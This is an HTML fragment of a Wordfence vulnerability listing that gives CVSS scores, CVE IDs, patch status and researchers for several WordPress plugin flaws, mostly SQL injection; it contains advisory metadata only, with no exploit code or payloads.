<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/export-user-data" target="_blank" rel="noopener">Export User Data</a> <span class="wfvr-software-slug">[export-user-data]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/eb0bbf47-a8c7-489d-a758-7b5771c2fcbd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/58dfc436-7ef9-4e1e-9cf2-e5da264f7959" target="_blank" rel="noopener">Jeg Kit for Elementor – Powerful Addons for Elementor, Widgets &amp; Templates for WordPress &lt;= 3.2.10 &#8211; Authenticated (Author+) PHP Object Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65549" target="_blank" rel="noopener noreferrer">							CVE-2026-65549						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jeg-elementor-kit" target="_blank" rel="noopener">Jeg Kit for Elementor – Powerful Addons for Elementor, Widgets &amp; Templates for WordPress</a> <span class="wfvr-software-slug">[jeg-elementor-kit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/58dfc436-7ef9-4e1e-9cf2-e5da264f7959" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5c55abc7-b09d-4fea-bc2f-b903d3da119f" target="_blank" rel="noopener">Online Scheduling and Appointment Booking System &lt;= 27.5 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14516" target="_blank" rel="noopener noreferrer">							CVE-2026-14516						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookly-responsive-appointment-booking-tool" target="_blank" rel="noopener">Online Scheduling and Appointment Booking System – Bookly</a> <span class="wfvr-software-slug">[bookly-responsive-appointment-booking-tool]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-nguyen" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2c009f880c37af5ab9adcc8490628a98.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2c009f880c37af5ab9adcc8490628a98"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-nguyen" target="_blank" rel="noopener">Nguyen Ngoc Duc (duc193)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5c55abc7-b09d-4fea-bc2f-b903d3da119f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/178e2537-e900-4264-9b29-1bb5bac36f48" target="_blank" rel="noopener">PickPlugins Question Answer &lt;= 1.2.73 &#8211; Unauthenticated SQL Injection via &#8216;id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-10207" target="_blank" rel="noopener noreferrer">							CVE-2026-10207						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/question-answer" target="_blank" rel="noopener">PickPlugins Question Answer</a> <span class="wfvr-software-slug">[question-answer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-rayyan-aryasatya" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4240823195d4b265f3cd4ca5947a5e1c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4240823195d4b265f3cd4ca5947a5e1c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-rayyan-aryasatya" target="_blank" rel="noopener">Adam Rayyan Aryasatya</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/178e2537-e900-4264-9b29-1bb5bac36f48" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b288386c-709c-49a6-9b46-28bf46c3c303" target="_blank" rel="noopener">Premium Packages &lt;= 6.2.0 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12800" target="_blank" rel="noopener noreferrer">							CVE-2026-12800						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdm-premium-packages" target="_blank" rel="noopener">Premium Packages – Sell Digital Products Securely</a> <span class="wfvr-software-slug">[wpdm-premium-packages]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/talal-nasraddeen" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/51ac16594069727fd09950dd36cda805.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="51ac16594069727fd09950dd36cda805"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/talal-nasraddeen" target="_blank" rel="noopener">Talal Nasraddeen</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b288386c-709c-49a6-9b46-28bf46c3c303" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ec1de1f5-6530-4cca-8b9e-3cb7e01e3cf2" target="_blank" rel="noopener">Qode Tours &lt;= 3.1.3.1 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65546" target="_blank" rel="noopener noreferrer">							CVE-2026-65546						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/qode-tours" target="_blank" rel="noopener">Qode Tours</a> <span class="wfvr-software-slug">[qode-tours]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bonds" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bonds" target="_blank" rel="noopener">Bonds</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ec1de1f5-6530-4cca-8b9e-3cb7e01e3cf2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/42acc6e4-ceee-4551-bca4-4f8d0a958eef" target="_blank" rel="noopener">Simply Schedule Appointments &lt;= 1.6.12.10 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65508" target="_blank" rel="noopener noreferrer">							CVE-2026-65508						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simply-schedule-appointments" target="_blank" rel="noopener">Simply Schedule Appointments</a> <span class="wfvr-software-slug">[simply-schedule-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/42acc6e4-ceee-4551-bca4-4f8d0a958eef" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b0e973b-f0bf-44d1-b964-e259f68291aa" target="_blank" rel="noopener">TrueBooker &lt;= 1.2.2 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13161" target="_blank" rel="noopener noreferrer">							CVE-2026-13161						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking" target="_blank" rel="noopener">TrueBooker – Appointment Booking and Scheduler System</a> <span class="wfvr-software-slug">[truebooker-appointment-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karan-j" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/fb7c688fd0a4e11bf489da14ffa632a3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fb7c688fd0a4e11bf489da14ffa632a3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karan-j" target="_blank" rel="noopener">Karan J</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b0e973b-f0bf-44d1-b964-e259f68291aa" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1bfa1538-7722-458d-a6a5-adde03e21e1a" target="_blank" rel="noopener">Uncanny Automator &lt;= 7.3.2 &#8211; Missing Authorization to Authenticated (Subscriber+) Sensitive Integration Metadata Disclosure via Multiple AJAX Endpoints</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15025" target="_blank" rel="noopener noreferrer">							CVE-2026-15025						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/uncanny-automator" target="_blank" rel="noopener">Uncanny Automator – Easy Automation, Integration, Webhooks &amp; Workflow Builder Plugin</a> <span class="wfvr-software-slug">[uncanny-automator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thevietronin" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d2de85470fb8bc914ee4f18ea34d49db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d2de85470fb8bc914ee4f18ea34d49db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thevietronin" target="_blank" rel="noopener">thevietronin</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1bfa1538-7722-458d-a6a5-adde03e21e1a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4e88efe0-ffad-4d66-bb03-3f3a9dcbe5b1" target="_blank" rel="noopener">User Access Manager &lt;= 2.3.15 &#8211; Unauthenticated Arbitrary File Read via &#8216;uamgetfile&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18352" target="_blank" rel="noopener noreferrer">							CVE-2026-18352						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-access-manager" target="_blank" rel="noopener">User Access Manager</a> <span class="wfvr-software-slug">[user-access-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2be53568b04545bf9e036c375a3d44d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2be53568b04545bf9e036c375a3d44d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener">Supakiad S. (m3ez)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4e88efe0-ffad-4d66-bb03-3f3a9dcbe5b1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7320421b-6b88-452d-a363-a71cdf7953a6" target="_blank" rel="noopener">Web Directory Free &lt;= 1.7.13 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14785" target="_blank" rel="noopener noreferrer">							CVE-2026-14785						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/web-directory-free" target="_blank" rel="noopener">Web Directory Free</a> <span class="wfvr-software-slug">[web-directory-free]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nhien-pham-nhienit" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/dd648f7d75a7e7a46d7d82c57b085613.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dd648f7d75a7e7a46d7d82c57b085613"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nhien-pham-nhienit" target="_blank" rel="noopener">Nhien Pham (nhienit)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thevietronin" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d2de85470fb8bc914ee4f18ea34d49db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d2de85470fb8bc914ee4f18ea34d49db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thevietronin" target="_blank" rel="noopener">thevietronin</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7320421b-6b88-452d-a363-a71cdf7953a6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9b6fe22-330a-4c24-9fdf-16f35516fb2a" target="_blank" rel="noopener">WP Fast Total Search &lt;= 1.80.280 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12741" target="_blank" rel="noopener noreferrer">							CVE-2026-12741						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fulltext-search" target="_blank" rel="noopener">WP Fast Total Search – The Power of Indexed Search</a> <span class="wfvr-software-slug">[fulltext-search]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9b6fe22-330a-4c24-9fdf-16f35516fb2a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6113e51e-d842-433a-ab0a-92ea108917a3" target="_blank" rel="noopener">WP OAuth Server ( Login with WordPress ) &lt;= 6.2.0 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65520" target="_blank" rel="noopener noreferrer">							CVE-2026-65520						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-oauth-20-server" target="_blank" rel="noopener">WP OAuth Server ( Login with WordPress )</a> <span class="wfvr-software-slug">[miniorange-oauth-20-server]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luis-koleski" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cacf4ee88693364dcf8ccac51b575d6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cacf4ee88693364dcf8ccac51b575d6b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luis-koleski" target="_blank" rel="noopener">Luis Koleski</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6113e51e-d842-433a-ab0a-92ea108917a3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/76fb0ffd-32c1-483d-ae95-9bc70ba1c064" target="_blank" rel="noopener">Advanced Shipment Tracking for WooCommerce &lt;= 3.9 &#8211; Authenticated (Shop Manager+) SQL Injection via &#8216;tracking_provider&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-advanced-shipment-tracking" target="_blank" rel="noopener">Advanced Shipment Tracking for WooCommerce</a> <span class="wfvr-software-slug">[woo-advanced-shipment-tracking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-quang-truong-roll" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c2f379550a74607b173a9a120b640a71.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c2f379550a74607b173a9a120b640a71"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-quang-truong-roll" target="_blank" rel="noopener">Nguyen Truong (Roll)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/76fb0ffd-32c1-483d-ae95-9bc70ba1c064" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f419eceb-a3e7-4cf7-a37e-dcc57a26d7f5" target="_blank" rel="noopener">AffiliateWP &lt;= 2.35.0 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65515" target="_blank" rel="noopener noreferrer">							CVE-2026-65515						</a>					</strong>
				</div>
